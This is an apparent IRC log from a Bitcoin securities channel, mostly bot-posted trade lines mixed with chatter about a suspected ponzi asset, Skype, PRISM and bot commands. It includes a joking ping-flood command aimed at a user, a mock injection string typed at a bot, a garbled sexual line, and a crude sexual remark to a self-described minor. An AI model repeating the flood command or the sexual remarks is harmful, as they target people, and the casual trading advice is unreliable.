09 19:53:10 [MPEX] [S.DICE] 470 @ 0.00238499 = 1.1209 BTC [+] Jul 09 19:53:12 [MPEX] [S.DICE] 1000 @ 0.002385 = 2.385 BTC [+] Jul 09 19:53:14 [MPEX] [S.DICE] 500 @ 0.00238999 = 1.195 BTC [+] Jul 09 19:53:30 [MPEX] [S.DICE] 500 @ 0.00239 = 1.195 BTC [+] Jul 09 19:53:32 [MPEX] [S.DICE] 500 @ 0.00239999 = 1.2 BTC [+] Jul 09 19:53:48 [MPEX] [S.DICE] 1735 @ 0.0024 = 4.164 BTC [+] Jul 09 19:55:03 haha nope Jul 09 19:56:01 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Jul 09 19:56:25 was not at all interested in girls then. actually... http://trilema.com/2011/verisoara-de-la-tara/ http://trilema.com/2011/vegetanpizda/ Jul 09 19:56:40 there, if you manage to get that translated it'll give you an idea of me at the time. Jul 09 19:56:50 sexually speaking. Jul 09 19:57:26 [BTCTC] [AMC-PT] 155 @ 0.002 = 0.31 BTC [-] Jul 09 19:57:48 [BTCTC] [AMC-PT] 155 @ 0.0023 = 0.3565 BTC [+] Jul 09 19:58:24 [BTCTC] [AMC-PT] 175 @ 0.002 = 0.35 BTC [-] Jul 09 19:58:37 [BTCTC] [AMC-PT] 111 @ 0.0023 = 0.2553 BTC [+] Jul 09 19:59:06 Good Lord, mircea_popescu, you really don't hold anything back, do you? :P Jul 09 19:59:34 [HAVELOCK] [ASICM] 1 @ 0.042867 BTC [-] Jul 09 20:01:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.041949 BTC [-] Jul 09 20:02:54 What it after a certain amount of code he did, and her panties have gotten a flag as tetra, white and large glowing hanging in telescopic antenna's radio. Jul 09 20:02:57 okay Jul 09 20:03:09 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [+] Jul 09 20:03:11 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [+] Jul 09 20:03:13 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [+] Jul 09 20:04:13 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 09 20:04:15 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 09 20:04:20 Keep those PT's coming through.. Jul 09 20:06:23 [BTCTC] [DMS.PURCHASE] 592 @ 0.048913 = 28.9565 BTC [-] Jul 09 20:06:59 you jinxed it Jul 09 20:07:26 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.004699 = 0.0329 BTC [-] Jul 09 20:08:24 [BTCTC] [DMS.MINING] 20 @ 0.018303 = 0.3661 BTC [+] Jul 09 20:08:26 [BTCTC] [DMS.MINING] 12 @ 0.018302 = 0.2196 BTC [-] Jul 09 20:08:26 [BTCTC] [DMS.MINING] 500 @ 0.0182 = 9.1 BTC [-] Jul 09 20:08:28 [BTCTC] [DMS.MINING] 10 @ 0.01816 = 0.1816 BTC [-] Jul 09 20:08:29 [BTCTC] [DMS.MINING] 122 @ 0.018082 = 2.206 BTC [-] Jul 09 20:08:31 [BTCTC] [DMS.MINING] 46 @ 0.018082 = 0.8318 BTC [-] Jul 09 20:09:15 [BTCTC] [DMS.PURCHASE] 255 @ 0.048913 = 12.4728 BTC [-] Jul 09 20:12:47 [BTCTC] [DMS.MINING] 255 @ 0.018082 = 4.6109 BTC [-] Jul 09 20:13:28 [BTCTC] [DMS.PURCHASE] 101 @ 0.048913 = 4.9402 BTC [-] Jul 09 20:13:46 [BTCTC] [DMS.SELLING] 90 @ 0.03098 = 2.7882 BTC [+] Jul 09 20:13:48 [BTCTC] [DMS.SELLING] 10 @ 0.03098 = 0.3098 BTC [+] Jul 09 20:13:53 matthew_boyd: you wouldnt by chance know an ian mcconiville do you? Jul 09 20:14:08 No, should I :P Jul 09 20:14:25 just making sure. I know an matt boyd from years ago. :) Jul 09 20:14:37 hey ukto Jul 09 20:14:50 what? you wanna throw hot coals at me more? :P Jul 09 20:14:54 Ukto: would be pretty awesome if I did know you, that would definitely be interesting :P Jul 09 20:15:12 hehe, i have met quite a few ppl on irc now Jul 09 20:15:22 met up with quite a few ppl in london the other week Jul 09 20:15:40 can you change the maximum issued count of shares for DMC? Jul 09 20:15:45 sure, open a ticket Jul 09 20:16:07 I have 2 support guys now doing weex and bf who are pretty good at knocking things out :) Jul 09 20:16:23 wait, bf has a support system now? Jul 09 20:16:31 bf has always had a support system Jul 09 20:16:38 help tab Jul 09 20:16:43 er menu item thing Jul 09 20:16:44 :P Jul 09 20:16:47 [BTCTC] [ASICMINER-PT] 1 @ 4.151 BTC [-] Jul 09 20:16:49 [BTCTC] [ASICMINER-PT] 2 @ 4.15 = 8.3 BTC [-] Jul 09 20:17:23 [BTCTC] [RSM] 2 @ 0.015002 = 0.03 BTC [-] Jul 09 20:18:34 Ukto: there, sent a request. Jul 09 20:18:47 [BTCTC] [DMS.MINING] 101 @ 0.018082 = 1.8263 BTC [-] Jul 09 20:18:57 Ukto: I find it funny people have been bitching about it Jul 09 20:19:24 Ukto: since its obvious BF does not have the right number because shares were destroyed before DMC moved to BF from GLBSE Jul 09 20:19:24 one sec Jul 09 20:19:27 I will let them know Jul 09 20:19:43 i was just told its already done Jul 09 20:19:44 lol Jul 09 20:19:55 matthew_boyd not as much as most people i guess Jul 09 20:20:21 [BTCTC] [DMS.PURCHASE] 20 @ 0.048912 = 0.9782 BTC [-] Jul 09 20:20:23 [BTCTC] [DMS.PURCHASE] 74 @ 0.048913 = 3.6196 BTC [+] Jul 09 20:21:08 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00469 = 0.0235 BTC [-] Jul 09 20:21:17 wtf Ukto is alive Jul 09 20:21:24 always alive Jul 09 20:21:26 just busy Jul 09 20:21:33 Ukto: lol Jul 09 20:21:53 Ukto: thanks Jul 09 20:22:14 i didnt do it :P Jul 09 20:22:15 lol Jul 09 20:22:38 Ukto is a full time exchange runner now :P Jul 09 20:22:56 been for a long time now stringy :P Jul 09 20:23:20 just roll it into dmc 2.0 Jul 09 20:23:20 :P Jul 09 20:23:22 [BTCTC] [RSM] 1 @ 0.015001 BTC [-] Jul 09 20:23:25 what happened to your billion dollar plan Diablo-D3 Jul 09 20:23:31 thestringpuller: its not over yet. Jul 09 20:23:38 anywho, afk Jul 09 20:23:39 [BTCTC] [RSM] 1 @ 0.015 BTC [-] Jul 09 20:23:40 then why do you want it to be over? Jul 09 20:23:41 thestringpuller: but I cant move forwards until all the DMC stock has been returned Jul 09 20:23:47 ah Jul 09 20:24:17 [BTCTC] [RSM] 1 @ 0.014001 BTC [-] Jul 09 20:24:40 [BTCTC] [RSM] 1 @ 0.014 BTC [-] Jul 09 20:25:10 [BTCTC] [RSM] 9 @ 0.013501 = 0.1215 BTC [-] Jul 09 20:25:15 so I think in the next 2 months I'll pass the 3/4ths mark Jul 09 20:25:59 [BTCTC] [GSDPT] 75 @ 0.002283 = 0.1712 BTC [+] Jul 09 20:26:29 [BTCTC] [GSDPT] 1 @ 0.002284 BTC [+] Jul 09 20:26:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.040901 = 0.2045 BTC [-] Jul 09 20:26:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.040901 = 0.2454 BTC [-] Jul 09 20:27:23 [BTCTC] [GSDPT] 14 @ 0.002375 = 0.0333 BTC [+] Jul 09 20:28:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.0409 = 0.2863 BTC [-] Jul 09 20:28:58 [BTCTC] [AMC-PT] 6 @ 0.002205 = 0.0132 BTC [-] Jul 09 20:29:05 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 09 20:29:08 [BTCTC] [ASICMINER-PT] 1 @ 4.100002 BTC [-] Jul 09 20:30:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.0409 = 0.3272 BTC [-] Jul 09 20:30:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.040801 = 0.816 BTC [-] Jul 09 20:30:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.0408 = 0.408 BTC [-] Jul 09 20:31:04 [BTCTC] [AMC-PT] 119 @ 0.002205 = 0.2624 BTC [-] Jul 09 20:32:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.040901 = 0.3681 BTC [+] Jul 09 20:34:26 [HAVELOCK] [HIM] 2 @ 0.3 = 0.6 BTC [+] Jul 09 20:35:03 [HAVELOCK] [HIM] 4 @ 0.295 = 1.18 BTC [-] Jul 09 20:35:24 [BTCTC] [AMC-PT] 75 @ 0.0023 = 0.1725 BTC [+] Jul 09 20:35:26 [BTCTC] [AMC-PT] 250 @ 0.002399 = 0.5998 BTC [+] Jul 09 20:35:27 [BTCTC] [AMC-PT] 61 @ 0.002399 = 0.1463 BTC [+] Jul 09 20:35:29 [BTCTC] [AMC-PT] 3742 @ 0.0024 = 8.9808 BTC [+] Jul 09 20:35:30 [BTCTC] [AMC-PT] 238 @ 0.0024 = 0.5712 BTC [+] Jul 09 20:35:31 [BTCTC] [AMC-PT] 4000 @ 0.0024 = 9.6 BTC [+] Jul 09 20:35:32 [BTCTC] [AMC-PT] 1537 @ 0.00241 = 3.7042 BTC [+] Jul 09 20:35:33 [BTCTC] [AMC-PT] 349 @ 0.00241 = 0.8411 BTC [+] Jul 09 20:35:34 [BTCTC] [AMC-PT] 506 @ 0.00245 = 1.2397 BTC [+] Jul 09 20:35:35 [BTCTC] [AMC-PT] 1 @ 0.002451 BTC [+] Jul 09 20:35:37 [BTCTC] [AMC-PT] 1000 @ 0.002479 = 2.479 BTC [+] Jul 09 20:35:38 [BTCTC] [AMC-PT] 5000 @ 0.002485 = 12.425 BTC [+] Jul 09 20:35:39 [BTCTC] [AMC-PT] 9966 @ 0.00249 = 24.8153 BTC [+] Jul 09 20:35:41 [BTCTC] [AMC-PT] 20 @ 0.002499 = 0.05 BTC [+] Jul 09 20:35:42 [BTCTC] [AMC-PT] 232 @ 0.002499 = 0.5798 BTC [+] Jul 09 20:36:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.0408 = 0.2448 BTC [-] Jul 09 20:36:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.040751 BTC [-] Jul 09 20:36:54 [BTCTC] [TAT.ASICMINER] 9 @ 0.0407 = 0.3663 BTC [-] Jul 09 20:36:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0407 = 0.0814 BTC [-] Jul 09 20:38:54 [HAVELOCK] [KCIM] 1 @ 0.85 BTC [+] Jul 09 20:39:17 [BTCTC] [AMC-PT] 125 @ 0.00249 = 0.3113 BTC [-] Jul 09 20:40:03 [MPEX] [S.MPOE] 12552 @ 0.00081531 = 10.2338 BTC [+] Jul 09 20:43:38 thestringpuller re the entire "they fucked up wow by making the endgame accessible to entitled idiots" stuff : https://forums.eveonline.com/default.aspx?g=posts&t=153979 Jul 09 20:43:43 there they are in eve too. Jul 09 20:44:50 [HAVELOCK] [KCIM] 1 @ 0.85 BTC [+] Jul 09 20:46:37 [BTCTC] [AMC-PT] 3500 @ 0.002499 = 8.7465 BTC [+] Jul 09 20:49:17 [HAVELOCK] [SDICE] 1 @ 0.189999 BTC [-] Jul 09 20:51:12 [HAVELOCK] [ASICM] 1 @ 0.04190702 BTC [-] Jul 09 20:53:02 [BTCTC] [AMC-PT] 300 @ 0.002499 = 0.7497 BTC [+] Jul 09 20:57:06 [BTCTC] [BITVPS] 1 @ 0.002046 BTC [-] Jul 09 20:57:09 well mp most of my wow raiding buddies are playing eve now Jul 09 20:57:46 [BTCTC] [BITVPS] 4 @ 0.002046 = 0.0082 BTC [-] Jul 09 21:01:11 [BTCTC] [TAT.ASICMINER] 18 @ 0.040504 = 0.7291 BTC [-] Jul 09 21:01:14 [BTCTC] [TAT.ASICMINER] 11 @ 0.040503 = 0.4455 BTC [-] Jul 09 21:01:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.040501 = 0.081 BTC [-] Jul 09 21:01:21 [BTCTC] [TAT.ASICMINER] 27 @ 0.0405 = 1.0935 BTC [-] Jul 09 21:04:38 i don't understand this amc stuff. i hold some amc-pt shares at btct and there is a huge wall sitting on 0.0025 and one on 0.002499. i have the option to transfer my shares to bitfunder and convert them so "am" shares, which are traded for ~0.002. so essentially trading on btct is locked down and i'd loose value if i transfer to bitfunder. i'd be very pleased if someone could brief me with a tl;tr what i'm missing here.. Jul 09 21:06:48 [BTCTC] [AMC-PT] 7850 @ 0.0025 = 19.625 BTC [+] Jul 09 21:07:03 i can Jul 09 21:07:09 please Jul 09 21:07:11 you are in a scammer's web Jul 09 21:07:12 [BTCTC] [BFMINES] 16 @ 0.004 = 0.064 BTC [+] Jul 09 21:07:18 [BTCTC] [GSDPT] 29 @ 0.002011 = 0.0583 BTC [-] Jul 09 21:07:45 basically you have two options Jul 09 21:07:52 get out at he highest price you can Jul 09 21:07:57 i don't care about it being toxic or not, as long as i can profit Jul 09 21:08:08 or stay in for the lonh haul by comverting to ActiveM Jul 09 21:08:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.040999 BTC [+] Jul 09 21:08:18 so Jul 09 21:08:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.040999 = 0.246 BTC [+] Jul 09 21:08:32 you suggest getting out at 0.002499 right now Jul 09 21:08:58 i won't go so far as to suggest what you should do Jul 09 21:08:59 but Jul 09 21:09:04 it's what *I* would do Jul 09 21:09:30 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0044 = 0.088 BTC [-] Jul 09 21:09:56 wow he really does have a wall up at 24999 Jul 09 21:09:59 hilarious Jul 09 21:10:20 if it were me, I'd be grateful for the way out Jul 09 21:10:27 [BTCTC] [COGNITIVE] 1 @ 0.255001 BTC [-] Jul 09 21:10:29 so there won't be some magical value gain in the next days for am and i would only receive 1 am share for 1 amc-pt and not 4 or something? Jul 09 21:10:49 [BTCTC] [DMS.MINING] 4 @ 0.01895 = 0.0758 BTC [+] Jul 09 21:10:53 ActM is inherently more "valuable" Jul 09 21:10:58 afaik Jul 09 21:11:02 stayingayou you're missing the part where you bought a ponzi Jul 09 21:11:08 write off the entire investment and move on. Jul 09 21:11:18 oh the wall is new. but many got screwed before it was there Jul 09 21:11:27 now they're just screwed a few percent :p Jul 09 21:11:31 thanks both of you for helping. Jul 09 21:11:53 there are still huge buys coming in right now Jul 09 21:12:18 [HAVELOCK] [ASICM] 75 @ 0.042798 = 3.2099 BTC [+] Jul 09 21:13:29 [MPEX] [S.MPOE] 9100 @ 0.00081531 = 7.4193 BTC [+] Jul 09 21:16:13 [BTCTC] [DMS.MINING] 25 @ 0.01895 = 0.4738 BTC [+] Jul 09 21:18:56 [19:35] <@assbot> [BTCTC] [AMC-PT] 3742 @ 0.0024 = 8.9808 BTC [+] [19:35] <@assbot> [BTCTC] [AMC-PT] 4000 @ 0.0024 = 9.6 BTC [+] [19:35] <@assbot> [BTCTC] [AMC-PT] 1537 @ 0.00241 = 3.7042 BTC [+] [19:35] <@assbot> [BTCTC] [AMC-PT] 1000 @ 0.002479 = 2.479 BTC [+] [19:35] <@assbot> [BTCTC] [AMC-PT] 5000 @ 0.002485 = 12.425 BTC [+] [19:35] <@assbot> [BTCTC] [AMC-PT] 9966 @ 0.00249 = 24.8153 BTC [+] Jul 09 21:20:20 [BTCTC] [AMC-PT] 202 @ 0.002499 = 0.5048 BTC [-] Jul 09 21:22:15 [BTCTC] [DMS.MINING] 5 @ 0.01895 = 0.0948 BTC [+] Jul 09 21:22:36 [BTCTC] [S.DICE-PT] 18 @ 0.002299 = 0.0414 BTC [+] Jul 09 21:24:28 [BTCTC] [DMS.MINING] 1 @ 0.01895 BTC [+] Jul 09 21:26:30 [BTCTC] [BASIC-MINING] 10 @ 0.289999 = 2.9 BTC [+] Jul 09 21:27:33 [BTCTC] [TAT.ASICMINER] 43 @ 0.040999 = 1.763 BTC [+] Jul 09 21:27:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.040999 = 0.082 BTC [+] Jul 09 21:30:40 It pains me every time I see a BFL update Jul 09 21:30:45 ;;ticker Jul 09 21:30:46 MtGox BTCUSD ticker | Best bid: 76.40000, Best ask: 76.69998, Bid-ask spread: 0.29998, Last trade: 76.40000, 24 hour volume: 26733.33739557, 24 hour low: 72.51000, 24 hour high: 78.64299, 24 hour vwap: 75.28859 Jul 09 21:30:57 [BTCTC] [DMS.MINING] 4 @ 0.01895 = 0.0758 BTC [+] Jul 09 21:33:03 [BTCTC] [B.YABMC] 1 @ 0.006194 BTC [-] Jul 09 21:38:14 [BTCTC] [ASICMINER-PT] 1 @ 4.061001 BTC [-] Jul 09 21:39:24 "The bursting of Bitcoin technology on the scene at this time in history is not a mere coincidence. It is a reaction to three separate epochal developments largely emanating from the developed economies: (1) centralized and oppressive monetary authority (2) a dominant and complicit legacy banking system, and (3) the eradication of financial privacy." Jul 09 21:39:30 https://bitcoinfoundation.org/blog/?p=222 Jul 09 21:39:31 Bitcoin Foundation: Blog Jul 09 21:39:40 Why I Accepted Executive Director Position for Bitcoin Foundation Jul 09 21:40:22 [BTCTC] [S.DICE-PT] 89 @ 0.002299 = 0.2046 BTC [+] Jul 09 21:40:23 [BTCTC] [S.DICE-PT] 400 @ 0.00238 = 0.952 BTC [+] Jul 09 21:40:25 [BTCTC] [S.DICE-PT] 100 @ 0.002393 = 0.2393 BTC [+] Jul 09 21:40:26 [BTCTC] [S.DICE-PT] 100 @ 0.002393 = 0.2393 BTC [+] Jul 09 21:40:27 [BTCTC] [S.DICE-PT] 981 @ 0.0024 = 2.3544 BTC [+] Jul 09 21:43:23 nice Jul 09 21:49:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.041001 = 2.0501 BTC [+] Jul 09 21:51:50 [BTCTC] [ASICMINER-PT] 1 @ 4.061016 BTC [+] Jul 09 21:51:52 [BTCTC] [ASICMINER-PT] 1 @ 4.061015 BTC [-] Jul 09 21:51:54 [BTCTC] [ASICMINER-PT] 1 @ 4.061001 BTC [-] Jul 09 21:53:13 ls Jul 09 21:53:21 git clone mircea_popescu Jul 09 21:53:24 didn't work darn Jul 09 21:53:45 git pop thestringpuller Jul 09 21:53:49 nope Jul 09 21:54:03 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004499 = 0.0135 BTC [+] Jul 09 21:54:38 [BTCTC] [ASICMINER-PT] 1 @ 4.224594 BTC [+] Jul 09 21:54:40 [BTCTC] [ASICMINER-PT] 1 @ 4.224595 BTC [+] Jul 09 21:54:42 [BTCTC] [ASICMINER-PT] 1 @ 4.224598 BTC [+] Jul 09 21:54:44 [BTCTC] [ASICMINER-PT] 1 @ 4.224599 BTC [+] Jul 09 21:54:45 [BTCTC] [ASICMINER-PT] 1 @ 4.229999 BTC [+] Jul 09 21:54:47 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [+] Jul 09 21:54:49 [BTCTC] [ASICMINER-PT] 1 @ 4.248 BTC [+] Jul 09 21:54:50 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 09 21:54:52 [BTCTC] [ASICMINER-PT] 16 @ 4.289899 = 68.6384 BTC [+] Jul 09 21:54:54 [BTCTC] [ASICMINER-PT] 6 @ 4.2899 = 25.7394 BTC [+] Jul 09 21:56:21 There we go Jul 09 21:58:48 [BTCTC] [S.DICE-PT] 440 @ 0.0024 = 1.056 BTC [+] Jul 09 21:59:43 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.004499 = 0.0765 BTC [+] Jul 09 22:02:35 [MPEX] [S.MPOE] 12850 @ 0.00081056 = 10.4157 BTC [-] Jul 09 22:06:25 is there a way to log into more than one Skype account at once? Jul 09 22:06:29 [BTCTC] [AMC-PT] 131 @ 0.002 = 0.262 BTC [-] Jul 09 22:06:30 on one PC Jul 09 22:06:55 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 09 22:06:57 Virtual Desktop? Jul 09 22:07:11 meh Jul 09 22:07:13 otherwise I would say no Jul 09 22:07:24 duping the app doesnt work? Jul 09 22:07:36 nope Jul 09 22:07:40 [BTCTC] [AMC-PT] 131 @ 0.002499 = 0.3274 BTC [-] Jul 09 22:07:41 ThickAsThieves: Trillian does it Jul 09 22:07:53 hrm Jul 09 22:07:56 Oh yeah completely forgot about... those options Jul 09 22:08:00 i havent used that in years Jul 09 22:08:09 does it support skyp group chats too? Jul 09 22:08:17 [BTCTC] [AMC-PT] 163 @ 0.002 = 0.326 BTC [-] Jul 09 22:08:29 I'm a fan of pidgin Jul 09 22:08:37 good question Jul 09 22:08:40 [BTCTC] [AMC-PT] 163 @ 0.002499 = 0.4073 BTC [+] Jul 09 22:09:00 dunno, but they are pretty active in developing it Jul 09 22:09:13 it supports multiple identities at the same time Jul 09 22:09:25 pretty cool Jul 09 22:09:32 [BTCTC] [AMC-PT] 203 @ 0.002499 = 0.5073 BTC [+] Jul 09 22:09:33 [BTCTC] [COGNITIVE] 5 @ 0.25 = 1.25 BTC [-] Jul 09 22:10:27 [BTCTC] [AMC-PT] 374 @ 0.002 = 0.748 BTC [-] Jul 09 22:11:15 [BTCTC] [AMC-PT] 193 @ 0.002499 = 0.4823 BTC [+] Jul 09 22:11:21 [BTCTC] [BASIC-MINING] 4 @ 0.28 = 1.12 BTC [-] Jul 09 22:12:01 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 09 22:12:15 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004499 = 0.0135 BTC [+] Jul 09 22:13:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.042289 = 0.4229 BTC [+] Jul 09 22:13:18 rulother: I really liked pidgin too on linux Jul 09 22:14:00 Yeah I love using it for work, just noticed it doesn't seem to support Skype, so I take that back as an option. Jul 09 22:14:13 Trillian says no to two skypes Jul 09 22:14:32 run one from a second user under linux. Jul 09 22:14:33 Could you use, Skype and Trillian? Jul 09 22:15:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.042289 = 0.6343 BTC [+] Jul 09 22:15:03 yeah Jul 09 22:15:36 How many accounts are we talking here Jul 09 22:16:17 [MPEX] [S.MPOE] 2983 @ 0.00080972 = 2.4154 BTC [-] Jul 09 22:16:28 2 Jul 09 22:17:43 ah, tough luck then :P Jul 09 22:18:01 now trillian is acting retarded Jul 09 22:18:26 Sounds like you're not running windows right Jul 09 22:18:47 [BTCTC] [DMS.MINING] 1 @ 0.01894 BTC [-] Jul 09 22:18:49 [BTCTC] [DMS.MINING] 12 @ 0.01894 = 0.2273 BTC [-] Jul 09 22:19:02 hey ddosers Jul 09 22:19:04 I'm over here Jul 09 22:19:06 heh Jul 09 22:19:11 get him! Jul 09 22:19:19 [BTCTC] [BITVPS] 20 @ 0.00192 = 0.0384 BTC [-] Jul 09 22:19:24 this program is shit Jul 09 22:19:35 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.004499 = 0.2025 BTC [+] Jul 09 22:19:38 ping -s 100000000000 unafilliated/topace Jul 09 22:20:13 Well if you are running windows... https://support.skype.com/en/faq/fa829/how-can-i-run-two-skype-accounts-on-the-same-computer Jul 09 22:21:16 [BTCTC] [COGNITIVE] 1 @ 0.220001 BTC [-] Jul 09 22:21:36 [BTCTC] [COGNITIVE] 1 @ 0.22 BTC [-] Jul 09 22:22:04 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 09 22:22:15 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00445 = 0.0178 BTC [-] Jul 09 22:22:16 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 09 22:22:45 rulother: yep, nice solution Jul 09 22:22:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0044 BTC [-] Jul 09 22:23:01 Didn't think it would be that easy frankly Jul 09 22:23:06 [BTCTC] [COGNITIVE] 1 @ 0.210501 BTC [-] Jul 09 22:23:31 Thought it would only allow one skype to be running at a single time Jul 09 22:24:12 [BTCTC] [DMS.MINING] 5 @ 0.018939 = 0.0947 BTC [-] Jul 09 22:24:13 perfect! Jul 09 22:24:14 thanks Jul 09 22:24:28 "We’ve been busy and just updated Skype for you. Enjoy our best experience yet." Jul 09 22:24:32 thanks Skype... Jul 09 22:24:41 more NSA hooks Jul 09 22:24:51 PRISM updates Jul 09 22:24:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.042289 = 0.4229 BTC [+] Jul 09 22:24:58 Na Microsoft wouldn't do that to you Jul 09 22:25:12 ofc not Jul 09 22:25:16 it's already official Jul 09 22:25:23 that Skyp is part of PRISM Jul 09 22:25:32 they would just do it themselves and then sold that info Jul 09 22:25:38 money to be made here! Jul 09 22:25:42 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 09 22:25:47 sell* Jul 09 22:26:22 Wait, Skype is part of PRISM? Jul 09 22:26:25 I'm fucked... Jul 09 22:26:39 so, which one of the users in this channel is the PRISM bot? Jul 09 22:26:51 [BTCTC] [BFMINES] 30 @ 0.004 = 0.12 BTC [+] Jul 09 22:27:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.042289 BTC [+] Jul 09 22:27:33 $&/#%;;;;report secrets Jul 09 22:27:55 Wait, this seems interesting, I missed the conversation, fill me in :D Jul 09 22:27:59 damn Jul 09 22:28:02 didn't work Jul 09 22:28:08 it's gribble Jul 09 22:28:10 clever programmers! Jul 09 22:28:31 ;;seen assbot Jul 09 22:28:31 assbot was last seen in #bitcoin-assets 1 minute and 24 seconds ago: [BTCTC] [TAT.ASICMINER] 1 @ 0.042289 BTC [+] Jul 09 22:28:47 ^ prism stuff. gribble knows everything Jul 09 22:29:00 indeed, you are right Jul 09 22:29:11 [BTCTC] [TAT.VIRTUALMINE] 541 @ 0.004399 = 2.3799 BTC [-] Jul 09 22:29:17 ;;seen tiberiusiv Jul 09 22:29:18 tiberiusiv was last seen in #bitcoin-assets 9 weeks, 0 days, 19 hours, 59 minutes, and 31 seconds ago: you cant read english paragraphs Jul 09 22:29:29 ;;seen nefario Jul 09 22:29:30 nefario was last seen in #bitcoin-assets 41 weeks, 0 days, 23 hours, 29 minutes, and 31 seconds ago: Those assets are not listed or traded anymore Jul 09 22:29:39 ^ lulz every time Jul 09 22:29:43 tru dat nef. Jul 09 22:30:17 ;;seen eskimobob Jul 09 22:30:17 eskimobob was last seen in #bitcoin-assets 5 days, 12 hours, 39 minutes, and 13 seconds ago: no idea how executions are shown on btct Jul 09 22:30:26 ah he was recent Jul 09 22:30:33 didnt notice Jul 09 22:30:44 jurov: hahaha Jul 09 22:30:47 who else is a gonner Jul 09 22:30:54 ;;seen smickles Jul 09 22:30:54 smickles was last seen in #bitcoin-assets 13 weeks, 5 days, 3 hours, 48 minutes, and 18 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Jul 09 22:31:01 ;;seen brendio Jul 09 22:31:01 brendio was last seen in #bitcoin-assets 44 weeks, 4 days, 4 hours, 25 minutes, and 9 seconds ago: *nef Jul 09 22:31:08 jurov: I guess he's not listed or traded anymore too! xD Jul 09 22:31:19 zactly Jul 09 22:32:17 ;;seen satoshi Jul 09 22:32:18 I have not seen satoshi. Jul 09 22:32:36 ;;seen amazingrando Jul 09 22:32:36 amazingrando was last seen in #bitcoin-assets 1 year, 9 weeks, 5 days, 19 hours, 34 minutes, and 20 seconds ago: hi! Jul 09 22:33:16 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 09 22:33:36 ;;seen pirateat40 Jul 09 22:33:36 pirateat40 was last seen in #bitcoin-assets 4 weeks, 6 days, 19 hours, 14 minutes, and 20 seconds ago: trollololol Jul 09 22:33:44 lol Jul 09 22:34:03 damn that's too recent! Jul 09 22:34:06 hehehe Jul 09 22:36:18 [BTCTC] [AMC-PT] 52 @ 0.0025 = 0.13 BTC [+] Jul 09 22:38:36 [MPEX] [S.MPOE] 3256 @ 0.00080972 = 2.6364 BTC [-] Jul 09 22:38:57 ;;seen gigavps Jul 09 22:38:58 gigavps was last seen in #bitcoin-assets 18 weeks, 4 days, 22 hours, 25 minutes, and 52 seconds ago: well, we can rule out c, i have block chain transaction to prove what i have paid Jul 09 22:39:38 [HAVELOCK] [VTX] 7 @ 0.9 = 6.3 BTC [-] Jul 09 22:41:11 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 09 22:42:14 ;;seen matthew_boyd Jul 09 22:42:14 matthew_boyd was last seen in #bitcoin-assets 14 minutes and 18 seconds ago: Wait, this seems interesting, I missed the conversation, fill me in :D Jul 09 22:42:17 [BTCTC] [DMS.SELLING] 4 @ 0.0301 = 0.1204 BTC [-] Jul 09 22:42:22 :O It's matthew_boyd Jul 09 22:42:44 [BTCTC] [DMS.PURCHASE] 5 @ 0.048913 = 0.2446 BTC [+] Jul 09 22:42:52 ;;seen matthew_boyd Jul 09 22:44:30 ;;seen matthew_boyd_drunk Jul 09 22:44:30 I have not seen matthew_boyd_drunk. Jul 09 22:44:38 !!!!! Jul 09 22:44:46 :O Jul 09 22:44:54 your first time on the internet eh? Jul 09 22:44:56 I am underage, you cannot sell me alcohol Jul 09 22:45:06 I know the question I have to answer: Jul 09 22:45:10 Tits or GTFo Jul 09 22:45:11 underage you say Jul 09 22:45:16 hahaha Jul 09 22:45:17 and I am still undecided :( Jul 09 22:45:26 Can you give me like 5 more minutes? Jul 09 22:45:53 [BTCTC] [AMC-PT] 28 @ 0.0025 = 0.07 BTC [+] Jul 09 22:47:09 matthew_boyd: just use *dice to decide. all or nothing Jul 09 22:47:26 oh, that's underage gambling. never mind Jul 09 22:48:15 [BTCTC] [ASICMINER-PT] 1 @ 4.100001 BTC [-] Jul 09 22:49:20 F the police and PRISM Jul 09 22:49:24 ;;dice Jul 09 22:49:25 